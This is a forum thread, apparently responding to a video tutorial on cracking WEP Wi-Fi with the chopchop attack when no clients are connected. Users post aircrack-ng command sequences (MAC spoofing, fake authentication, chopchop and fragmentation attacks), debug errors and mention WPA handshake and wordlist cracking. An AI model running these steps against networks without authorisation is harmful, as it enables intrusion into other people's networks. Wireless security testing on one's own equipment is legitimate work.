-=Xploitz=- VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"

[-=Xploitz=-]

Quote:

Originally Posted by bloody

Yeah I followed it exactly and I think that I'm understanding the whole background so I don't think that I am messing something up!
So far I read you never came across a router that was unbreakable? well this one is, lol, none of the attacks worked! On my older router it's working fine!
Just curious how this one is unhackable!

Whats the name of the router and your card your using??

[bloody]

It's FRITZ!Box Fon WLAN 7170
And I tried with Alfa and WUSB54G

[-=Xploitz=-]

Quote:

Originally Posted by bloody

It's FRITZ!Box Fon WLAN 7170
And I tried with Alfa and WUSB54G

Never came across a fritzbox yet. Aren't those made in Germany? AAhh ..yes they are. Even the great CISCO routers & AP's are vulnerable to at least the -5 Fragmentation attack. This Fritzbox shouldn't be any more difficult to crack. And you say you've tried ALL the available attacks? I might have to go out and buy one of these and test it out myself.

What attack are you using? And please list ALL commands you use....EXACTLY.

[bloody]

Alright
Well I have another fritzbox that acts the same way, but playing with -1 6000 -o 10 I got it working... but this one still no luck, looks like the amv (builder of fritz box) have done something different!

What I do, well let's go... btw only change between both cards is rausb0 and wlan0, so I will do it only for the wlan0 interface!

ifconfig down wlan0
airmon-ng stop wlan0
macchanger -m 00:11:22:33:44:55
ifconfig up wlan0

airodump-ng wlan0
lets say channel 11 and mac 11:22:33:44:55:66
airodump -c 11 -w test --bssid 11:22:33:44:55:66 wlan0

alright, now I have tested different methods, first starting the -3/-4/-5 attack and then -1, but usually I try it this way:

aireplay-ng -1 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0
(also tried with different viriations like:
-1 6000 -o 1 -q 10
-1 6000 -o 10 -q 10 - successfull for an older fritz box giving me some arps ,)
-1 512 -o 1 -q 30
)

after that I get ACK packages and everthying is, so this command works!
(and there is no MAC filtering enabled, just in case)

Then I start aireplay -4 or -5 attack :
aireplay-ng -4 -b 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

I get some packet and I wanna use it then, then the described error above in the postings shows! thats all! using the -5 attack there is also the error that packages arre corrupt!

That's all!
Looking forward

[bloody]

There is no follow up, so Im wondering if you cant reproduce it or can you, but you have no solution? or maybe some1 else?

TiA!

[mikeote]

Hey Xploits I just did my first chop chop attack on my AP which worked great !

Really great tut, v easy to follow and intergrate into your first wep cracking tut.

This one also served it's purpose as it shows an almost complete linux/aircrack suite n00b how to crack wep with no clients first time.

I have followed your third tut as well on wpa/wpa2, and gotten the 4 way handshake, though I gave up on cracking as I used that huge 2 gig word list, and didn't want to wait for ever for it to crack.

I'll use a smaller word list next time I try it, what's your default list ?

I've checked the share your wordlist thread, you recommend a few though i'de like to find out which word list is considered very efficient regarding thoroughness / size.

I read your last tut on speeding up the wpa crack, i'll try that as well, after i've finished tut3.

Cheers !
Mike

[lovena.2008]

thanks for this Tutorial

[goosed]

Hi all. Great tutorial, just have one question.

When doing "aireplay-ng -4" option, I wait until it finishes and then I get this message:

Code:

Warning: ICV checksum verification FAILED! Trying workaround

The AP appears to drop packets shorter than 34 bytes.
Enabling standard workaround: IP header re-creation.
This does look like an IP packet, try another one.

Workaround couldn't fix ICV checksum.
Packet is most likely invalid/useless
Try another one.

Any idea why this is happening? Thanks.

EDIT: I retried the step by said "n" to the first packet it chose. I tried again several times until I had a different MAC address, and did not receive the error message. The rest worked like a charm!

Great tutorial -=Xploitz=-!

[Sicnarf]

Tut was great and easy to follow and worked for me first time, thanks alot.

[n00b_h4xx0r]

Unbeliveble easy to follow!
This is so useful, have tried it on my ap and it works perfect!

I recommend this for begginers, srsly its soo easy.

Respect!